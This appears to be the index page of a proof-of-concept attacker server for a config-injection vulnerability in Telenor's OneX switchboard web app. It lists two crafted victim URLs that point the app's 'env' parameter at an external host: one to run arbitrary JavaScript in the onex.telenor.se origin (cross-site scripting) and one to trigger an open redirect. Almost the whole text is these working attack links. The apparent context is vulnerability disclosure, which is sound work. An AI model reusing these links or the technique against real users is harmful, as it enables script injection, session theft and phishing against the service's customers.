Telenor OneX config-injection PoC — attacker server

Serving (all responses with Access-Control-Allow-Origin: *):

Victim link — XSS (alert + arbitrary JS in onex.telenor.se origin)

https://onex.telenor.se/switchboard/?env=https%3A%2F%2Fxss.antoniusblock.net%2Fx
[open]

Victim link — open redirect (full-page redirect to this server)

https://onex.telenor.se/switchboard/?env=https%3A%2F%2Fxss.antoniusblock.net%2For_config
[open]